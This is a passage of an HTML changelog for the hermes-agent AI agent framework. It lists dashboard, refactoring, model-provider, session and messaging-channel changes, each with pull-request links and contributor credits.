<li><strong>Remote media relay</strong> — attach images/PDFs and display agent-written images over the network for the first time; remote-gateway file attachments via <code>file.attach</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/41336" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41336/hovercard">#41336</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42634" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42634/hovercard">#42634</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Client + backend version buttons + remote-backend update flow; browse remote backend files; route global-remote profile REST calls; recover chat after sleep/wake by revalidating a stale remote backend (<a href="https://github.com/NousResearch/hermes-agent/pull/42181" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42181/hovercard">#42181</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44326" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44326/hovercard">#44326</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47011" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47011/hovercard">#47011</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41350" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41350/hovercard">#41350</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Multi-profile fallout cleanup — WS auth + cross-profile session reads; release profile backends before delete; scope session list/model switch/timer per session (<a href="https://github.com/NousResearch/hermes-agent/pull/44529" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44529/hovercard">#44529</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42613" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42613/hovercard">#42613</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41103" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41103/hovercard">#41103</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41120" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41120/hovercard">#41120</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41182" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41182/hovercard">#41182</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Stream subagent activity into watch windows; keep streaming painting in unfocused secondary chat windows; recover stranded session windows (<a href="https://github.com/NousResearch/hermes-agent/pull/47060" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47060/hovercard">#47060</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47919" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47919/hovercard">#47919</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47655" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47655/hovercard">#47655</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
</ul>
<h2>📊 Web Dashboard</h2>
<ul>
<li>Full-featured profile builder (model + skills + MCPs); unify multi-profile management — one machine dashboard + global profile switcher; profile-scoped skills &amp; toolsets; session switcher panel on the Chat tab (<a href="https://github.com/NousResearch/hermes-agent/pull/39084" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39084/hovercard">#39084</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44007" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44007/hovercard">#44007</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43808" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43808/hovercard">#43808</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49077" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49077/hovercard">#49077</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Skills hub browser rehaul — connected hubs, featured, preview + security scan; SKILL.md editor on Skills page + attach-skill selector in cron modals; full per-MCP catalog detail; full tool-backend config in the GUI (<a href="https://github.com/NousResearch/hermes-agent/pull/40384" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40384/hovercard">#40384</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44231" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44231/hovercard">#44231</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/48520" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48520/hovercard">#48520</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40418" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40418/hovercard">#40418</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Enable webhooks from the Webhooks page; idempotent <code>hermes dashboard register</code>; auto-restart gateway after Telegram QR onboarding; file browser; change UI font from the theme picker; reasoning-effort picker in the chat sidebar (<a href="https://github.com/NousResearch/hermes-agent/pull/44021" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44021/hovercard">#44021</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42455" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42455/hovercard">#42455</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43424" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43424/hovercard">#43424</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43512" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43512/hovercard">#43512</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41145" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41145/hovercard">#41145</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49141" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49141/hovercard">#49141</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>🏗️ Core Agent &amp; Architecture</h2>
<h3>God-file refactor wave (run_agent.py / cli.py / gateway/run.py)</h3>
<ul>
<li><strong><code>cli.py</code> main() 3297 → 954 lines</strong> — extracted 28 subcommand parsers into <code>hermes_cli/subcommands/</code>, then promoted 9 closure handlers; 32 slash-command handlers → <code>CLICommandsMixin</code>; 18 model-flow wizard functions → <code>model_setup_flows</code>; agent-construction cluster → <code>CLIAgentSetupMixin</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/41798" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41798/hovercard">#41798</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41835" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41835/hovercard">#41835</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41942" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41942/hovercard">#41942</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42174" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42174/hovercard">#42174</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42153" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42153/hovercard">#42153</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong><code>gateway/run.py</code> 19157 → 15870 lines</strong> — 42 slash-command handlers → <code>GatewaySlashCommandsMixin</code>; authorization cluster → <code>GatewayAuthorizationMixin</code>; kanban watcher loops → <code>GatewayKanbanWatchersMixin</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/41886" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41886/hovercard">#41886</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42159" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42159/hovercard">#42159</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41849" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41849/hovercard">#41849</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong><code>run_agent.py</code> turn loop</strong> — extracted prologue into <code>TurnContext</code>, post-loop tail into <code>finalize_turn</code>, consolidated inner-retry-loop recovery flags into <code>TurnRetryState</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/41778" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41778/hovercard">#41778</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42169" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42169/hovercard">#42169</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41828" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41828/hovercard">#41828</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Agent loop, prompt &amp; tools</h3>
<ul>
<li><strong><code>memory</code> batch operations</strong> — atomic add/replace/remove array against the final char budget, so a single call can free space and add entries (<a href="https://github.com/NousResearch/hermes-agent/pull/48507" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48507/hovercard">#48507</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong><code>search_files</code> lossless densification</strong> — headroom evaluation report + the one densification improvement worth shipping (fewer tokens per result, same matches) (<a href="https://github.com/NousResearch/hermes-agent/pull/47866" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47866/hovercard">#47866</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Removed the agent-callable <code>send_message</code> tool; coding-context posture across CLI/TUI/desktop/ACP; <code>read_file</code> extracts <code>.ipynb</code>/<code>.docx</code>/<code>.xlsx</code> to text (<a href="https://github.com/NousResearch/hermes-agent/pull/47856" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47856/hovercard">#47856</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43316" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43316/hovercard">#43316</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37082" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37082/hovercard">#37082</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Context-file handling: configurable truncation limit + warnings; scale context-file cap to model window + point agent at the truncated file (<a href="https://github.com/NousResearch/hermes-agent/pull/47251" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47251/hovercard">#47251</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47846" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47846/hovercard">#47846</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Compression: temporal anchoring in compaction summaries; raise compaction trigger to 85% for gpt-5.5 on Codex OAuth (<a href="https://github.com/NousResearch/hermes-agent/pull/41102" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41102/hovercard">#41102</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40957" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40957/hovercard">#40957</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Adaptive middleware (consumed by NeMo-Relay observer telemetry); usable mid-turn steer — desktop affordance + trusted injection (<a href="https://github.com/NousResearch/hermes-agent/pull/29724" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29724/hovercard">#29724</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40240" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40240/hovercard">#40240</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Provider &amp; model support</h3>
<ul>
<li>New models: <code>z-ai/glm-5.2</code> (verified 1M context, OpenRouter + Nous), <code>anthropic/claude-fable-5</code>, <code>laguna-m.1</code> + <code>nemotron-3-ultra</code>, xAI Composer 2.5 in the OAuth picker; default xAI to <code>grok-build-0.1</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/47391" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47391/hovercard">#47391</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45695" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45695/hovercard">#45695</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42979" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42979/hovercard">#42979</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42629" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42629/hovercard">#42629</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47908" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47908/hovercard">#47908</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47371" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47371/hovercard">#47371</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Model picker: Refresh-Models control to bust stale cache; persist Nous recommended-models to disk + fall back on Portal failure; seed catalog disk cache from checkout on update; MiniMax-M3 reports true 1M context (<a href="https://github.com/NousResearch/hermes-agent/pull/48691" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48691/hovercard">#48691</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42628" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42628/hovercard">#42628</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42614" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42614/hovercard">#42614</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43338" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43338/hovercard">#43338</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Anthropic adaptive models: default to modern thinking contract; never send <code>reasoning</code> field; route <code>reasoning_effort</code> to verbosity; require confirmation for very expensive selections (<a href="https://github.com/NousResearch/hermes-agent/pull/42991" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42991/hovercard">#42991</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43012" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43012/hovercard">#43012</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43436" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43436/hovercard">#43436</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43391" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43391/hovercard">#43391</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Auth: auto-detect OpenRouter credential from the pool; keep Codex OAuth pool accounts distinct on add/re-auth; resolve xAI OAuth across profiles + write rotated tokens back to root; honor <code>model.default_headers</code> for custom OpenAI-compatible providers (<a href="https://github.com/NousResearch/hermes-agent/pull/42263" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42263/hovercard">#42263</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42316" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42316/hovercard">#42316</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/46614" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46614/hovercard">#46614</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41096" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41096/hovercard">#41096</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Bedrock falls back to non-streaming <code>InvokeModel</code> when IAM denies the streaming variant; Ollama default <code>max_tokens=65536</code>; surface model refusals as <code>content_filter</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/44293" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44293/hovercard">#44293</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41694" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41694/hovercard">#41694</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/46013" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46013/hovercard">#46013</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Sessions, state &amp; multi-agent</h3>
<ul>
<li>Optional <strong>max session cap</strong>; drop empty sessions on CLI exit and rotation; ACP session-provenance metadata for compression rotation (<a href="https://github.com/NousResearch/hermes-agent/pull/42389" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42389/hovercard">#42389</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43855" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43855/hovercard">#43855</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41724" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41724/hovercard">#41724</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Delegation: resolve custom-endpoint subagent pools by endpoint identity; remove the default subagent wall-clock timeout; stop subagent completion lines leaking into parent CLI display (<a href="https://github.com/NousResearch/hermes-agent/pull/41730" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41730/hovercard">#41730</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45149" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45149/hovercard">#45149</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44223" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44223/hovercard">#44223</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Kanban: config-gated auto-subscribe on <code>kanban_create</code>; machine-global singleton lock for the embedded dispatcher; pin assigned profile toolsets for workers; hold reclaim while worker still alive (<a href="https://github.com/NousResearch/hermes-agent/pull/48635" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48635/hovercard">#48635</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49068" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49068/hovercard">#49068</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45590" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45590/hovercard">#45590</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49064" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49064/hovercard">#49064</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Memory: configurable Hindsight retain observation scopes; OpenViking setup UX; Honcho gateway-gated identity tree; Supermemory session-level ingest (<a href="https://github.com/NousResearch/hermes-agent/pull/46611" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46611/hovercard">#46611</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/48262" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48262/hovercard">#48262</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44431" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44431/hovercard">#44431</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38756" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38756/hovercard">#38756</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>)</li>
</ul>
<h2>📱 Messaging Platforms (Gateway)</h2>
<h3>New channels</h3>
<ul>
<li><strong>iMessage via Photon Spectrum</strong> — <code>hermes photon login</code> (device-code OAuth), gRPC-native channel (no webhook), markdown rendering, emoji reactions, outbound media via spectrum-ts (<a href="https://github.com/NousResearch/hermes-agent/pull/32348" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32348/hovercard">#32348</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42582" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42582/hovercard">#42582</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44713" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44713/hovercard">#44713</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42397" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42397/hovercard">#42397</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>WhatsApp Business Cloud API</strong> adapter (official, no bridge process) (<a href="https://github.com/NousResearch/hermes-agent/pull/44331" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44331/hovercard">#44331</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43921" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43921/hovercard">#43921</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jquesnelle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jquesnelle">@jquesnelle</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>SimpleX</strong> — groups, native attachments, text batching, auto-accept; <strong>Raft</strong> bundled platform plugin with activity hooks (<a href="https://github.com/NousResearch/hermes-agent/pull/42584" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42584/hovercard">#42584</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/48210" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48210/hovercard">#48210</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Gateway core &amp; rendering</h3>
<ul>
<li>Render terminal tool calls as native bash code blocks on markdown platforms; bare fenced code blocks in chat; optional message timestamps for LLM context; configurable <code>tool_progress_grouping</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/41215" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41215/hovercard">#41215</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42576" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42576/hovercard">#42576</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47253" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47253/hovercard">#47253</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47228" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47228/hovercard">#47228</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Telegram: Bot API 10.1 rich messages (now always-on with opt-out); opt-in Online/Offline bot status indicator; stop cutting long streamed responses; MarkdownV2 on progress edits; gate oversized voice/audio before download (<a href="https://github.com/NousResearch/hermes-agent/pull/44829" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44829/hovercard">#44829</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45584" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45584/hovercard">#45584</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49134" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49134/hovercard">#49134</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43761" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43761/hovercard">#43761</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44245" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44245/hovercard">#44245</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
